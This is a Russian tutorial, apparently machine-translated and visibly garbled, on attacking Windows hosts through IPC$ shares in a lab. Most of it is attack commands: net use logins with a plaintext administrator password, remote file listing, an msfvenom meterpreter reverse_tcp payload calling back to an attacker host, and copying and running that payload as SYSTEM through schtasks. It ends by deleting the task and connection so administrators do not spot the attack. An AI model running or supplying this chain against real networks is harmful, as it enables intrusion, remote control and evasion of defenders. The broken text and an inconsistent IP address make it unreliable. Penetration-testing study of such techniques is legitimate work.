IPC$ (Internet Process Connection) — это ресурс, который совместно использует «именованные каналы». Это именованный канал, открытый для взаимодействия между процессами. Предоставляя доверенное имя пользователя и пароль, обе стороны могут установить безопасный канал и использовать этот канал для связи. Шифрует обмен данными для обеспечения доступа к удаленным компьютерам.
IPCЭто новая функция WinNT/2000, позволяющая одновременно установить только одно соединение между двумя IP-адресами. WinNT/2000 обеспечивает IPC.функционировать одновременно,Общий ресурс по умолчанию также был включен при первой установке системы.,То есть вся логика разделяет(c,d,e
Используйте соединение IPC$, чтобы установить соединение с целевым хостом.,используйте эту ссылку,Коннектор может получить структуру каталогов, список пользователей и другую информацию о целевом хосте.,В то же время вы можете загружать файлы на целевой хост.,и передать целевой хост Запланированные задача для выполнения определенных сценариев и многое другое.
(1) 139、445Порт открыт:ipcСоединение может осуществлять удаленный вход и доступ к общему ресурсу по умолчанию, а открытие порта 139 указывает на применение протокола netbios. Доступ к общим файлам/принтерам осуществляется через порты 139 и 445 (win2000). Поэтому, вообще говоря, ipc.Требуется подключение139или445Порт для поддержки。
(2) Администратор включил общий ресурс по умолчанию: Общий ресурс по умолчанию — это общий ресурс, который включен по умолчанию для облегчения удаленного управления администратором, то есть всеми логическими дисками (c,d,e...) и системный каталог win nnt или windows (admin),Проходим ИПЦ
При использовании IPC$ часто возникают следующие причины сбоя соединения:
Общие номера ошибок следующие:
Введите следующую команду в командной строке целевого хоста, чтобы просмотреть общие ресурсы, включенные на целевом хосте:
net share
Затем используйте следующую команду на атакующем хосте для удаленного подключения через IPC$:
net use \\192.168.188.140\ipc$ "1234Qwer!@#$" /user:administrator
Затем используйте следующую команду на атакующем хосте, чтобы просмотреть установленные в данный момент соединения:
net use
После использования команды net use для установления IPC$ с удаленным целевым компьютером вы можете использовать команду dir для вывода списка файлов на удаленном хосте, как показано на следующем рисунке:
dir \\192.168.188.149\c$
Вы можете использовать следующую команду для просмотра информации о процессе, выполняемом на удаленном хосте:
tasklist /S 192.168.188.140 /U Administrator /P 1234Qwer!@#$
at — это команда, поставляемая с Windows для создания задач. В основном она работает в Windows. server В операционных системах до 2008 года используйте команду at для создания Запланированные на удаленном целевом хосте. Процесс выполнения задачи примерно следующий:
Создайте Запланированные на удаленном компьютере с помощью команды at. Перед задачей вам также необходимо использовать сеть Используйте команду для установки IPC$. Вот простая демонстрация описанного выше процесса:
(1) Проверьте целевое системное время
net time \\192.168.188.140
(2) Скопируйте файлы в целевую систему.
Во-первых, нам нужно сгенерировать полезную нагрузку злоумышленника в MSF:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f exe > shell.exe
Затем настройте мониторинг с помощью msf:
Затем скопируйте файл Shell.exe на целевой хост:
copy shell.exe \\192.168.188.140\C$
Затем вы сможете увидеть успешно загруженный файл Shell.exe на диске C целевой системы:
(3) Используйте команду schtasks для создания Запланированные задачи.
Используйте команду at, чтобы позволить целевому хосту запустить программу в указанное время (22:22):
#Создайте Запланированные, которые запускаются в 22:22 задачи
schtasks /create /tn "test" /tr c:\shell.exe /s 192.168.188.140 /sc once /st 22:22 /ru system /f /u administrator /p "1234Qwer!@#$"
#создавать Запланированные После выполнения задачи, если временной интервал слишком велик и вы не хотите ждать, вы можете сразу запустить бэкдор-программу.
schtasks /run /tn "test" /s 193.168.188.140 /u administrator /p "1234Qwer!@#$"
После этого снаряд был успешно отбит обратно в рамках проникновения MSF:
Информация о запланированных задачах на целевом хосте:
(4)удалить Запланированные задачи Записывать
Запланированные Задача не удаляется при выполнении самостоятельно, поэтому администраторы сети могут использовать Запланированные, созданные злоумышленником. задаче сообщается, что сеть подвергается атаке, но некоторые злоумышленники очистят созданные ими файлы Запланированные задача, например:
schtasks /delete /s 192.168.188.140 /tn "test" /f
Запланированные задачи Успешноудалить:
Хотя Запланированные задачи были удалены, оболочка в MSF не отключится:
(5)Удалить запись IPC$.
В то же время нам также необходимо удалить созданную запись IPC$:
net use 'имя' /del /y
существоватьудалитьipcПри удалении убедитесь, что вы удаляете созданный вами ipc.,При использовании команды schtasks файл журнала C:\windows\tasks\schedlgu.txt останется в системе.,Если нет эха после выбора только команды schtasks,ipc можно настроить